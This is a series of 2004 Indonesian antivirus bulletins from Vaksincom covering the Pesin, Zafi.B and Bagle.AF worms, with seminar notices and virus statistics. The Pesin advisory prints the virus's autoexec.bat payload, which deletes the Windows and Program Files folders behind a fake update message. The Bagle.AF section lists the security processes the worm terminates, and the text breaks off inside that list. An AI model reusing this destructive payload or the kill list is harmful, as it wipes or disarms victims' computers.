Laporan Foto

Seminar Save Our Bandwidth     Jakarta 1 Juni 2004

Jakarta Design Center

Peserta acara Seminar Save Our Bandwidth di Jakarta yang diadakan pada tanggal 1 Juni 2004 mendapatkan "kejutan" manis dari MSI, Micro Star International. Motherboard MSI Neo 648 F, USB StarHUB 1 to 4 MSI dan Optical Mouse MSI dibagikan secara Gratis bagi peserta (khususnya wanita ... dalam rangka meningkatkan jumlah wanita yang tertarik pada dunia IT) yang menyimak dan dapat menjawab pertanyaan yang diajukan panitia. Seminar sendiri dibawakan dengan sangat menarik oleh Yahya, Administrator yang berpengalaman dari CBN yang menerangkan seluk beluk email dan bagaimana sebenarnya proses pengiriman email di mailserver ISP sampai ke user dan siapa sebenarnya yang mengirimi virus serta bagaimana mendetekis IP pengirim virus yang sebenarnya (karena email pengirim dipalsukan oleh virus).

Nantikan acara Save Our Bandwidth di Surabaya tanggal 23 Juni 2004 yang diadakan oleh Ronar www.ronar.co.id bersama Radnet Surabaya www.sby.rad.net.id di Hotel Majapahit yang tetap di dukung oleh MSI yang memberikan hadiah heboh Motherboard, USB 1 to 4 dan Optical Mouse MSI sebanyak total 20 buah. Tunggu juga kehadiran Save Our Bandwidth di Jogjakarta.

Bagaimana ngga senang, sudah dapat ilmu, antivirus Gratis ... dapat Motherboard MSI Neo 648 F lagi :).

Delapan peserta yang beruntung mendapatkan Motherboard MSI, USB Hub dan Optical Mouse MSI

10 peserta yang bertanya mendapatkan souvenir dari CBN

Gambar dibawah ini sengaja dihilangkan supaya email ini tidak terlalu besar. Jika anda ingin melihat gambar selengkapnya silahkan lihat di

http://vaksin.com/sob_jakarta.htm

Marcel Geminiman (MGM) in Action

Coffee Break

Coffee Break II

Yahya dari CBN dan peserta seminar serius menyimak

Wisnu dari PC Plus yang membuka acara Save Our Bandwidth di Jakarta

AJT (Adang Juhar Taufik) membagikan sertifikat. Namanya jangan salah lagi, Novvika atau Novikka ?

Virus Ulangtahun "Pesin"         7 Juni 2004

Virus lokal yang melakukan Deltree pada Win 98

Sejak hari Jumat 4 Juni 2004, belantara internet Indonesia "kembali" digemparkan oleh aksi virus yang sangat mengejutkan karena secara serentak berhasil medelete komputer korbannya. Meskipun aksi ini tergolong "tidak kejam" jika dibandingkan dengan aksi Explorezip.N atau Klez.E karena yang dihapus adalah direktori c:\windows dan c:\Program_Files dengan perintah deltree. Jika anda menjadi korban Klez atau Explorezip.N yang dihancurkan adalah data anda yang tidak dapat direcover dengan proses biasa sehingga sangat berpotensi mengakibatkan kerugian materi dan waktu. Sedangkan pembuat Pesin ini masih "tidak kejam" menghancurkan data MS Office dan "hanya" menghancurkan direktori windows dan program files yang dapat dengan mudah di instal kembali tanpa mengalami masalah yang berarti.

Vaksin.com sendiri pada awalnya menerima ratusan konfirmasi korban Pesin ini dan pada awalnya sempat kebingungan mencari virus apa sebenarnya yang menyebabkan wabah ini. Setelah mendapatkan sampel dari beberapa rekan khususnya saudara Cinta Jumari dari PT. R baru kami mengetahui bahwa virus yang kita hadapi adalah Pesin yang memang menyimpan "bom waktu" dimana pada tanggal 4 Juni 2004 akan membuat file autoexec.bat sebagai berikut :

@echo off
Echo Pesan ini kutujukan kepada mereka yang tak percaya akan
Echo Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi
Echo apakah orang bodoh tak punya Impian ... ?? Hanya dengan
Echo dalih ketidak percayaan, kalian telah hancurkan impian Putih ku
Echo Tak apa ... !! karna kini impian itu tlah berubah menjadi
Echo Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian
Echo telah tuduhkan kepadaku ... !! Hari ini adalah Hari Ulang Tahun Ku
Echo yang ke - 21Aku punya kado manis untuk mu !! semoga dengan kado ini kamu
Echo dapat nikmati .... !!
Echo Kepada Bapak Samsu dan Ibu Heni "Terima Kasih Kalian tlah tanamkan impian hitam dihati ini"
Echo Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,
Echo Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3
Echo I LOVE U ALL
Echo Bye Bye
pause
Echo Windows is updating file(s) Please wait....
Deltree /y C:\Windows
Deltree /y C:\Program Files

Jika komputer korbannya menggunakan Windows yang menjalankan autoexec.bat secara otomatis pada saat booting, maka otomatis program autoexec akan menampilkan pesan yang dalam dua hari ini sangat populer dan membuat Pak Samsu dan Ibu Heni disebut-sebut orang :). (lihat gambar 1)

Gambar 1

Setelah pesan tersebut tampil, jangan sekali-kali menekan tombol apapun pada komputer anda karena proses berikutnya yang akan dijalankan adalah Deltree (penghapusan menyeluruh) pada direktori c:\windows dan c:\Program_Files yang dijamin akan membuat komputer anda lumpuh total dan tidak bisa dioperasikan. Jika anda menghadapi masalah ini, langsung matikan komputer anda dengan cara mencabut stop kontak atau menekan tombol power dan segera hubungi bagian IT anda untuk disembuhkan.

Deltree hanya berjalan pada windows 98 / 95

Dari pengamatan dan laporan yang didapatkan oleh PT. Vaksincom, hanya komputer yang menggunakan OS Windows 9X (95/97/98) yang menjadi korban aksi Deltree dan Windows ME / XP / NT/ 2000 tidak terpengaruh aksi Deltree walaupun Pesin tetap dapat menginfeksi OS ini. Setelah ditelusuri lebih jauh, ternyata autoexec.bat tidak secara otomatis dijalankan oleh OS non windows 9X dan command Deltree juga tidak dikenal oleh Win 2000 / XP diganti dengan command rmDir (Remove Directory). Karena itu, sampai hari ini Vaksincom belum menerima satupun laporan OS Windows XP / 2000 yang menjadi korban aksi "ulangtahun" Pesin.

Norman Virus Control mendeteksi Pesin sejak November 2003

Banyaknya korban Pesin ini menunjukkan bahwa penyebaran Pesin memang luar biasa dan merata diseluruh Indonesia, selain itu hal ini menunjukkan bahwa para pengguna komputer masih belum memproteksi dirinya dengan program antivirus yang terupdate dan handal dan banyak perusahaan yang menggunakan antivirus personal untuk melindungi jaringannya, padahal untuk melindungi komputer dalam jaringan diperlukan perlindungan antivirus jaringan dan bukan standalone. Padahal Norman Virus Control sudah dapat mendeteksi Pesin sejak November 2003 http://www.vaksin.com/1203.htm (lihat gambar 2).

Apa yang harus anda lakukan jika komputer anda terinfeksi Pesin ?

1. Instal Norman Virus Control dan lakukan update.

2. Jalankan komputer dalam kondisi Safe Mode (hal ini untuk mencegah proses Pesin dijalankan dan memblok akses regedit).

3. Scan komputer anda dan bersihkan file yang terdeteksi sebagai Pesin.

4. Bersihkan registri yang dirubah oleh Pesin dengan mendelete key :
   HKLM\Software\Microsoft\Windows\CurrentVersion\
   Run\ "LoadService" = "C:\<Windows System>\SYSTASK.EXE /run" (lihat gambar 3)
   

5. Restart komputer anda.

Referensi :

http://www.detikinet.com/index.php/detik.read/tahun/2004/bulan/06/tgl/05/time/131316/idnews/160438/idkanal/110 (Virus Ulang Tahun jangkiti panwaslu Sulteng)

http://www.detikinet.com/index.php/detik.read/tahun/2004/bulan/06/tgl/07/time/14323/idnews/160778/idkanal/110 (Mengatasi Virus Ulang Tahun)

AAT

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

http://www.vaksin.com

Email : info@...

Seminar Save Our Bandwidth di Surabaya

2 Motherboard MSI NEO 648 F + 8 Optical Mouse MSI + 8 USB Hub 1 to 4 MSI dibagikan untuk peserta seminar

Materi Seminar :

Siapa sebenarnya yang mengirimi saya virus ?

Cara membasmi virus yang efektif dan melindungi komputer dari serangan virus

Tempat

Andika Room, Hotel Majapahit

Jl. Tunjungan 65, Surabaya

Waktu

Rabu, 23 Juni 2004

Gelombang I : 09.00 s/d 12.00

Gelombang II : 13.00 s/d 16.00

Pembicara

Team Vaksincom

Team RADNET Surabaya

Biaya Rp. 80.000,-

Sudah termasuk :

1 Lisensi Norman Virus Control for workstation + update definisi & engine 1 tahun (value Rp. 380.000,-)

Koleksi virus removal tools Vaksincom

Tabloid PC Plus

Snack 1 kali

Souvenir

Registrasi :

Radnet Surabaya

BRI Tower 8th floor suite 803

Jl. Jend. Basuki Rahmat 122

Surabaya

Telp : 031-547 5678    Fax : 031-532 0350

info@...

Pendukung Seminar : MSI, PC Plus, PT. Vaksincom dan RADNET Surabaya

W32/Zafi.B@mm       15 Juni 2004

Worm multi Bahasa menyerang email dan P2P

Ini adalah salah satu virus worm baru yang menyebar dengan melalui email dengan menggunakan beberapa bahasa yang berbeda, misalnya bahasa Inggris, Hungaria dan Rusia. Kalau varian aslinya yaitu W32/Zafi.A@mm hanya menggunakan bahasa Hungaria. Virus ini dikemas dengan menggunakan metode FSG-PACKED yang berukuran 12,800 byte dan jika dijalankan akan membentuk sebuah file yang berukuran 30Kb. Jadi diperkirakan asal mula virus ini adalah dari Hungaria. Virus ini ditulis dengan bahasa assembly (WoW).

Apa saja yang dilakukan oleh virus ini?

Ketika email yang bervirus datang ke dalam Inbox mail client anda, dan kemudian anda klik file attachnya, maka ia akan membuat 2 buah salinan dirinya pada direktori System dengan nama file secara acak yang berekstensi *.EXE dan *.DLL sebagai contoh :

C:\WINDOWS\System\ZAQWSXCV.EXE

C:\WINDOWS\System32\POIKLMNJ.DLL

Dan juga membuat registry value yang akan mengesekusi worm setiap kali Windows start :

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\_Hazafibb =

"%System%\<worm_executable>"

Metode Penyebaran :

Virus ini akan menggunakan fasilitas email sebagai sarana penyebaran dirinya dan ia mempunyai SMTP sendiri, jadi memudahkan dalam penyebaran dirinya. Ia akan memeriksa seluruh file yang mengandung alamat email dari file-file yang berekstensi tm, wab, txt, dbx, tbb, asp, php, sht, adb, mbx, eml atau pmr pada local fixed drives C, D, E, F, G dan H. Ketika ia mencari alamat email pada file-file tersebut, ia menghindari setiap alamat yang mengandung kata atau strings :

win

use

info

help

admi

webm

micro

msn

hotm

suppor

syma

vir

trend

panda

yaho

cafee

sopho

google

kasper

Ia juga mencari file Windows Address Book (WAB), dengan melalui registry value:

HKCU\Software\Microsoft\WAB\WAB4\Wab File Name\(Default)

Ia menciptakan 5 file pada direktori System untuk menyimpan alamat-alamat ini. File-file ini mempunyai nama yang dirandom dan berextensi *.DLL

C:\WINDOWS\system\kenbdplk.dll

C:\WINDOWS\system32\zibscdes.dll

C:\WINNT\system32\qfafsxoz.dll

C:\WINNT\system32\zhzukrhp.dll

C:\WINNT\system32\sdxsuwxt.dll

Ia membawa beberapa template dengan bahasa yang berbeda pada format email. Dan seperti biasa file attachment-nya berextensi *.PIF", ".EXE" atau ".COM (lihat gambar 1).

Gambar 1

Menggunakan P2P (Network Share) :

Worm ini mengkopikan dirinya pada direktori yang mempunyai nama "share" atau "upload", dengan asumsi direktori ini adalah direktori yang disharing dan menempatkan beberapa file antara lain :

-    winamp 7.0 full_install.exe

-    Total Commander 7.0 full_install.exe

Di sisi lainnya, virus ini akan mematikan seluruh aktivitas dari program firewall dan antivirus yang terdapat di dalam komputer korban. Serta beberapa fasilitas windows tools seperti MSCONFIG, REGEDIT, TASK MANAGER.

Selain itu virus ini juga akan melakukan serangan dDOS ke web site di bawah ini :

-          www.parlament.hu

-          www.virusbuster.hu

-          www.virushirado.hu

-          www.2f.hu

Apa yang harus dilakukan untuk mencegah virus ini?

Kalau anda rajin mengikuti perkembangan virus saat ini, anda dapat melihat bahwa setiap attachment yang disertakan adalah dalam bentuk file yang berekstensi *.PIF, *.SCR, *.DLL, *.EXE, *.COM atau *.VBS. Oleh sebab itu pastikan antivirus anda sudah dapat menahan virus-virus yang masuk melalui email seperti Norman Internet Protection yang akan menscan setiap email masuk dan keluar dari mail client anda pada level proxy (baik Outloook, Eudora, The Bat maupun Pegasus) sehingga semua email yang anda terima dan anda kirim aman dari infeksi virus (lihat gambar 2).

Gambar 2, Norman Internet Protection memproteksi email anda pada level proxy dan bersifat mail client independent sehingga apapun mailclient yang anda gunakan akan dapat diproteksi dengan baik oleh Norman.

Jalankan opsi filter pencegahan incoming dan outgoing attach yang mengandung ekstensi seperti yang sudah disebutkan di atas. Kemungkian besar tanpa mengupdate data definisi virus anda, untuk sementara bisa dicegah terlebih dahulu. Karena email tersebut langsung dihapus/delete ketika masuk ke dalam inbox mailclient anda. Dan untuk pencegahan lebih lanjut mau tidak mau anda harus mengupdate data definisi virus anda.

Evaluasi Virus Indonesia Juni 2004       5 Juli 2004

Duet "Netbot" ancaman Sharopova

Selain Euro dan kampanye presiden, bulan Juni ditandai dengan munculnya juara Wimbledon baru, Maria Sharapova yang tidak kalah cantik dari Anna Kournikova yang virusnya sempat membuat gempar di bulan Februari 2001. Vaksin.com mengingatkan kepada para pengguna internet untuk berhati-hati terhadap kemungkinan munculnya virus baru yang kemungkinan besar akan menggunakan rekayasa sosial Maria Sharapova, apalagi dengan beredarnya source code Bagle yang disebarkan secara sengaja (lihat berita situs online Bisnis Indonesia di www.bisnis.com Virus varian Bagle akan menyerang jaringan komputer ) yang membuka peluang besar sekali bagi para programmer pemula untuk membuat virus baru.

Sedangkan penyebaran virus dan insiden virus yang paling banyak terjadi di Indonesia menurut pemantauan Vaksin.com adalah duet antara Netsky & the gang (varian-variannya) dengan Gaobot, kami di Vaksincom menyebut duet ini sebagai "Netbot" (Netsky Gaobot). Kalau Netsky akan menghabiskan kuota mailbox anda dan meningkatkan biaya internet anda, Gaobot akan melakukan hal yang mirip dengan Sasser (karena menyerang celah keamanan yang sama dengan Sasser) dengan merestart komputer anda dan menampilkan pesan error LSASS dan mampu menyebarkan dirinya secara otomatis dengan menscan jaringan, dengan kata lain komputer anda dapat langsung terinfeksi Gaobot hanya dengan terhubung ke jaringan / internet. Akibat tidak langsungnya adalah akses jaringan / internet anda melambat dengan sangat signifikan.

Dominasi Netsky & the Gang duet dengan Gaobot dan Sasser

Sampai dengan akhir Juni 2004, virus Netsky dan variannya masih menguasai belantara pervirusan di Indonesia dengan persentase 43 %. Hal ini cukup merisaukan karena ukuran Netsky mencapai 30-40 KB. Dibandingkan dengan email biasa yang ukurannya 10 KB, maka setiap kali anda menerima 1 virus netsky sama dengan menerima 3 email biasa. Jika mailbox anda memiliki kapasitas 10 MB yang kira-kira bisa menerima 1.000 email berukuran 10 MB, dengan adanya Netsky yang ikutan masuk ke mailbox anda maka cukup 300 virus netsky sudah membuat mailbox anda kepenuhan dan anda tidak akan dapat menerima email lagi kecuali semua email sudah di download atau di delete. Menurut pengamatan yang kami lakukan, > 50 % mailbox dipenuhi oleh virus yang berarti pengguna internet hanya menikmati 50 % bandwidth dari yang dibayarkannya. Sebagai contoh jika anda membayar Rp. 100.000,- setiap bulan untuk download email, maka bandwidth yang sebenarnya anda gunakan untuk kepentingan anda adalah 50 % atau Rp. 50.000,-, sedangkan selebihnya digunakan untuk mendownload virus.

Preventif

Untuk menghindari hal tersebut di atas, para pengguna internet dapat melakukan beberapa tindakan pencegahan :

1. Pilih ISP yang menginstal antivirus pada mailservernya, biasanya malah ada ISP sekalian memberikan antispam gratis** pada mailservernya.
   Aktifkan fitur antivirus pada mailserver sehingga setiap email yang masuk ke mailbox anda terlebih dahulu akan discan dahulu oleh program antivirus di level mailserver dan virus sejenis Netsky dan Bagle yang banyak berkeliaran sudah dapat teridentifikasi oleh antivirus pada mailserver. Menurut catatan Vaksincom, beberapa ISP yang menerapkan antivirus di mailserver adalah CBN Jakarta, Bonet dan Centrin Bandung. Dengan mengaktifkan antivirus pada mailserver ISP berarti email yang masuk ke mailbox anda yang mengandung virus ataupun dicurigai mengandung virus akan dihentikan dan tidak dimasukkan ke mailbox anda sehingga ketika anda melakukan download email bandwidth anda tidak akan terbuang percuma untuk mendownload virus. Sebenarnya secara ideal, yang menderita kerugian dalam hal ini adalah pihak ISP karena walaupun mailservernya dilengkapi dengan program antivirus, sebenarnya email yang mengandung virus tetap diterimanya dan menghabiskan bandwidth yang dimilikinya, hanya saja demi kepentingan pelanggan ISP memang harus memberikan layanan yang baik dan menjadi bemper. Cara yang lebih baik untuk mengatasi hal ini adalah semua ISP secara pro aktif memberikan program antivirus yang handal kepada semua pelanggannya sehingga tidak saling mengirimkan virus dan menghabiskan bandwidth secara percuma.
   Hati-hati dengan false positive pada program antispam karena email yang seharusnya bukan spam akan diperlakukan sebagai spam dan kerugian atas email yang tidak diterima karena diblok oleh antispam bisa tidak terkirakan dan sebagus apapun program antispam, akan menjadi masalah besar jika mengandung false positive. Gunakan filter canggih Bayesian untuk meningkatkan akurasi antispam tapi jangan lupa bahwa hal ini membutuhkan partisipasi aktif anda dalam menentukan email spam.

2. Pilih ISP yang perduli pada pekentingan customer dan berperan aktif dalam menghemat bandwidth demi kepentingan bersama.
   Sebenarnya ISP sangat berkepentingan dengan efisiensi bandwidth dan jika semua ISP secara pro aktif mendidik usernya dan memberikan program antivirus yang handal dan ekonomis, ancaman hilangnya bandwidth karena virus akan dapat diatasi dengan sangat signifikan. Adapun ISP yang berpartisipasi secara aktif dalam program ini adalah Bonet, Indonet Malang, Pandaan, Mojokerto, Wasantara Kupang, Palembang dan Radnet lihat Daftar Koordinator Wilayah SOB (Save Our Bandwidth).

3. Gunakan webmail untuk memeriksa semua email dan hapus email yang bervirus atau tidak anda perlu guna sebelum melakukan download email melalui pop.
   Setiap ISP memberikan fasilitas untuk mengakses email melalui browser, tanyakan alamat webmail dari email anda kepada ISP anda. Login ke webmail sebelum download email anda dan hapur email yang mengandung virus atau spam yang tidak anda inginkan sehingga ketika anda melakukan download email hanya email yang berguna yang anda download. Selain itu, webmail juga sangat berguna jika anda tidak memiliki akses ke pop mailclient atau berada di luar negeri namun anda tetap ingin mengecek email anda.

4. Gunakan maillcient yang mendukung download "mail header".
   Ada cara yang lebih mudah relatif lebih hemat bagi anda dibandingkan menggunakan webmail untuk menghapus email bervirus. Gunakan mailclient yang mendukung fasilitas download "mailheader" seperti Microsoft Outlook 2003. Dengan fasilitas ini anda bisa mendownload semua "header" email pada mailbox anda untuk anda lihat secara offline dan memutuskan mana email yang ingin anda download dan mana email yang ingin anda hapus. Pada saat koneksi ke internet yang berikutnya anda dapat melakukan sinkronisasi dan semua email yang anda tandai untuk dihapus akan langsung dihapus dari server dan download hanya dilakukan pada semau email yang anda tandai untuk di download. Keuntungan dari metode ini dibandingkan dengan webmail adalah proses pembacaan header email dapat anda lakukan secara offline sehingga menghemat bandwidth online.

5. Instal antivirus yang tepat dan terupdate secara otomatis guna menghindari komputer anda terinfeksi virus.
   Gunakan antivirus jaringan untuk melindungi jaringan dan pastikan bahwa antivirus anda memiliki kemampuan untuk update definisi dan engine secara otomatis tanpa memerlukan intervensi manusia. Ingat, untuk menghadapi ancaman worm yang dapat menginfeksi komputer anda secara otomatis anda juga harus memberikan perlindungan yang otomatis pada sistem komputer anda. Selain itu, pastikan juga bahwa program antivirus yang anda beli mendapatkan support lokal karena dengan support lokal anda akan dapat menghadapi semua ancaman virus apapun dimasa depan dan semuanya tidak digantungkan hanya di pundak anda,

6. Update operating system yang anda gunakan dengan patch terakhir dan usahakan ada bantuan dari pihak yang berkompeten jika anda menghandle banyak komputer dengan berbagai macam OS.
   Software adalah buatan manusia dan buatan manusia tidak ada yang sempurna. Perlu anda ketahui bahwa setiap hari ditemukan puluhan celah keamanan baru pada berbagai software dan hardware buatan manusia. Ada kesan kuat bahwa software buatan Microsoft sangat rentan terhadap serangan, secara kasat mata hal tersebut kelihatannya betul tetapi sebenarnya hal tersebut tidak sepenuhnya benar karena banyak faktor yang menyebabkan suatu OS diserang, salah satunya adalah karena popularitasnya yang sangat tinggi sehingga setiap serangan terhadap OS buatan Microsoft akan memberikan dampak yang maksimal dan hal tersebut memang yang dicari oleh pembuat virus. Celah keamanan selalu ditemukan dan program apapun yang populer akan cenderung untuk selalu diserang. Perlu menjadi catatan bahwa celah keamanan juga ditemukan pada program lain yang sangat populer seperti Winamp, BlackIce (firewall) dan beberapa hardware Cisco juga mengandung celah keamanan.
   Guna menjaga program yang anda gunakan selalu terupdate, usahakan untuk memanfaatkan fitur"automatic update" dari windows (khususnya windows XP dan 2000). Pada windows XP anda dapat menemukan menu Windows Update di "Control Panel". Dengan mengaktifkan Windows Update secara otomatis setiap saat secara otomatis windows akan mencari update terbaru secara otomatis dan melakukan download. Namun untuk komputer yang memiliki bandwidth kecil atau komputer dial up hal ini agak kurang realistis karena biasanya ukuran update cukup besar dan menghabiskan waktu yang cukup lama untuk download. Untuk koneksi broadband hal ini dapat dilakukann namun perlu dilakukan penyesuaian waktu update pada saat-saat traffic rendah (seperti tengah malam) apalagi kalau koneksi internetnya di share ramai-ramai. Vaksin.com menyediakan update patch dan service pack bagi semua OS / software (Win 9X/ME/NT/2000/XP/Server, IE update dan OE update) dalam bentuk CD Gratis bagi semua pelanggan secara teratur dan tidak ada biaya apapun untuk mendapatkan CD tersebut.

Jika anda mengamati hasil statistik insiden virus yang terdeteksi oleh Vaksincom di seluruh Indonesia, peringkat pertama tetap didominasi oleh Netsky dan keluarganya Netsky (Netsky.B, C, D, P, Q dan Z) dengan 43 % insiden disusul oleh Bagle dan variannya sebanyak 14 %. Setelah itu Sasser.B 12 % dan jawara lama yang tetap panjang umur Redlof.A 11 % dan Redlof.C 10 % dan Dumador 3 %. Yang penting menjadi catatan kami adalah makin maraknya Adware yang terdeteksi oleh Norman Virus Control seperti Ncase, Startpage dan 2ndthought yang jumlahnya mencapai 7 % dari seluruh insiden. Adware bukanlah virus, namun adware merupakan program yang akan memunculkan iklan-iklan yang menjengkelkan setiap kali  kita mengaktifkan browser kita. Pada kebanyakan kasus, adware mengubah Startpage dari browser untuk menunjuk pada satu situs yang telah ditentukan dan kita tidak dapat menggantinya walaupun sudah mengubah internet option. Hal ini terjadi karena adware beraksi dengan mengganti parameter di registri. Pada beberapa kasus yang parah, adware ini akan menjalankan aksinya seperti virus dimana walaupun sudah berusaha di hilangkan tetap akan kembali lagi karena walaupun sudah di hilangkan semua keynya dari registri, namun program master penginstal adware ini masih bercokol di komputer atau pengguna komputer kembali mengunjungi situs yang mengandung adware. Untuk mencegah hal ini terjadi, kami sarankan anda meningkatkan sekuriti dari browser anda dengan tidak menjalankan script secara otomatis dan menggunakan antivirus yang dapat mendeteksi adware seperti Norman Virus Control dan menambahkan program anti adware yang dapat di download secara gratis di www.download.com.

   Gambar 1, Grafik Virus Indonesia Juni 2004

Tabel 2, Detail virus yang terdeteksi Juni 2004

salam,

AAT

PT. Vaksincom

Gedung Rifa lt. IV

Prof. Dr. Satrio blok C4 / 6-7

Jakarta 12950

Telp : 021-526 0787 / 752

Http://www.vaksin.com

Email : info@...

W32/Bagle.AF@mm                  16 Juni 2004

Menabuh genderang perang kembali dengan membasmi Netsky

     Setelah "salah satu" penyebar Netsky, Sven Jaschan di tangkap oleh polisi Jerman, perang antara Bagle dengan Netsky kelihatannya mereda dan pemunculan varian baru menurun. Meskipun diperkirakan bahwa pembuat Netsky bukan hanya Sven Jaschan (18 tahun) melainkan satu team dan Sven Jaschan ini merupakan salah satu yang agak "ceroboh" sehingga bisa tertangkap. Sven Jaschan dituduh menyebarkan varian Sasser dan Netsky.Z yang menyerang institusi pendidikan di Swiss, Amerika dan Jerman. Anda harus berhati-hati kembali karena di dunia maya sedang beredar varian Bagle yang baru, Bagle.AF. Balge.AF menabuh genderangp erang kembali dengan menghapus Netsky pada komputer yang terinfeksi, menghapus program keamanan seperti antivirus dan firewall serta "kembali" menjadikan komputer korbannya sebagai server spam.

Datang dalam berbagai lampiran eksekutable termasuk .zip berpassword

Bagle.AF akan datang dalam berbagai lampiran eksekutable seperti :

• BAT
• CMD
• COM
• COMO
• CPL
• EXE
• JS
• JSE
• PIF
• SCR
• VBE
• VBS
• WSF
• WSH
• WSWH
• ZIP

dan yang harus anda waspadai adalah lampiran dalam bentuk terkompres .zip yang berpassword. Lampiran zip dengan password ini akan mampu menembus pertahanan antivirus anda yang terupdate sekalipun karena program antivirus tidak mampu mendeteksi virus yang terkandung dalam file terkompres yang diberi password (kecuali beberapa program antivirus mutakhir seperti Norman Virus Control yang dapat mendeteksi Bagle.AF dengan teknologi Sandbox sekalipun belum terupdate). Biasanya administrator akan memblok semua file eksekutable seperti .bat, .exe, .com dst tetapi meloloskan file terkompres seperti .zip dan .rar karena secara teori virus dalam keadaan terkompres tidak akan mampu menjalankan aksinya. Tetapi yang menjadi masalah adalah setelah sampai ke user penerima email, lampiran .zip tersebut akan dibuka dan virus tersebut akan aktif jika program antivirusnya belum terupdate.

Menghentikan 289 proses aplikasi sekuriti dan membalas dendam pada Netsky

Bagle.AF kami kategorikan berbahaya karena dalam aksinya ia akan menghapus beberapa program antivirus dan firewall dari komputer korbannya. Adapun program yang "di incar" oleh Bagle.AF sangat banyak dan proses (program) yang akan dihentikan oleh Bagle sangat banyak, 289 proses software. Adapun beberapa program yang dihentikan Bagle.AF adalah sebagai berikut :

AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATUPDATER.EXE
ATWATCH.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVLTMAIN.EXE
AVprotect9x.exe
AVPUPD.EXE
AVSYNMGR.EXE
AVWUPD32.EXE
AVXQUAR.EXE
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
BORG2.EXE
BS120.EXE
CDP.EXE
CFGWIZ.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
CFIAUDIT.EXE
CFIAUDIT.EXE
CFINET.EXE
CFINET.EXE
CFINET32.EXE
CFINET32.EXE
CLEAN.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CLEANPC.EXE
CMGRDIAN.EXE
CMGRDIAN.EXE
CMON016.EXE
CMON016.EXE
CPD.EXE
CPF9X206.EXE
CPFNT206.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
DEFWATCH.EXE
DEPUTY.EXE
DPF.EXE
DPFSETUP.EXE
drvsys.exe
DRWATSON.EXE
DRWEBUPW.EXE
ENT.EXE
ESCANH95.EXE
ESCANHNT.EXE
ESCANV95.EXE
EXANTIVIRUS-CNET.EXE
FAST.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FRW.EXE
FSAV.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
GBMENU.EXE
GBPOLL.EXE
GUARD.EXE
GUARDDOG.EXE
HACKTRACERSETUP.EXE
HTLOG.EXE
HWPE.EXE
IAMAPP.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSSUPPNT.EXE
ICSUPP95.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFW2000.EXE
IPARMOR.EXE
IRIS.EXE
JAMMER.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-WRP-421-EN-WIN.EXE
KILLPROCESSSETUP161.EXE
LDPRO.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LSETUP.EXE
LUALL.EXE
LUCOMSERVER.EXE
LUINIT.EXE
MCAGENT.EXE
MCUPDATE.EXE
MCUPDATE.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
MU0311AD.EXE
NAV80TRY.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NSCHED32.EXE
NTVDM.EXE
NUPGRADE.EXE
NVARCH16.EXE
NWINST4.EXE
NWTOOL16.EXE
OSTRONET.EXE
OUTPOST.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAV8WIN32ENG.EXE
REGEDIT.EXE
REGEDT32.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SFC.EXE
SGSSFW32.EXE
SH.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SMC.EXE
SOFI.EXE
